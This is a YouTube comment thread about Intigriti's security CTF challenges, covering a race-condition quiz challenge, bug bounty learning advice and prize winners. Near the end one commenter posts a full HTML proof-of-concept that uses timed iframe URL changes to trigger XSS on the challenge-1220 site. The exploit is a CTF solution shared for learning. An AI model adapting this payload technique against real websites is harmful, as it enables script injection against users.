Відео

It won't help, the flag is stored on the server and is only sent when the database itself contains a point score >= 100.

@@GoatSniff ooh nyc thanks bro bro can you please tell me how i improved my hacking mindset??

​@@sahilabbasi7184 For Bug Bounty, Zseano has a great mindset. For Security in general, check out LiveOverflow, he's often spewing wisdom :)

@@GoatSniff thanks bro :) but my problem is that when I was sleeping I got lots of ideas to come into my mind that's how I bypass the firewall restrictions or any kind of restrictions but when I am on bug hunting then Ideas is not come into my mind how i can prevent from it please help me 🙏🙏😭😭

@@sahilabbasi7184 I have no cure for that, sorry. Just keep hunting, your brain will adapt naturally :)

Thanks so much man! I was chatting with PinkDraconian just before the CTF and he mentioned your name and that you're an insane researcher so i spent like an hour watching some of your HTB videos, you're insane! Regarding this challenge though, actually behind the scenes Intigriti ended up adding a manual sleep of 100ms before final line of code to set the quiz question to complete to help people get their race conditions to work so I think even just a simple loop of async requests would have been fast enough. One guy in the discord said his team mate got it just by spam clicking the answer, lol. No fancy race condition tactics needed :D

​@@GoatSniff awww ty, i'm a n00b though really, still got lots to learn :) wtf haha I did try just spam clicking as well but never got it above 30 points xD hopefully my team got it!

He won a €50 swag voucher for it :)

No, the challenge ended on December 14th and they have picked all 6 winners of the competition already. They do these challenges quite frequently so I recommend you follow them on twitter for the next challenge and try to figure out the solution. If you can solve it, you may be picked as a winner for a prize

I just did it all in an HTML file when I was solving. Just save this into a file.html then open it in any web browser: <!DOCTYPE html> <html> < id="intigriti" src="challenge-1220.intigriti.io/?javascript:alert(document.domain)//#&num1=onhashchange&operator=%3D&num2=init" width=1000 height=1000></> <script> setTimeout(changeFirst, 1000); setTimeout(changeSecond, 2000); function changeFirst(){ document.querySelector("#intigriti").src = "challenge-1220.intigriti.io/?javascript:alert(document.domain)//#&num1=a&operator=%3D&num2=searchQueryString"; } function changeSecond(){ document.querySelector("#intigriti").src = "challenge-1220.intigriti.io/?javascript:alert(document.domain)//#&num1=location&operator=%3D&num2=a"; } </script> </body> </html>

@@GoatSniff ahh my bad.. I was thinking of console and self-xss point of view. I forgot you can directly call html file😅. Thank you for reply and putting complete poc. Keep doing more, great video. Would love to learn some more, have a good day! 💐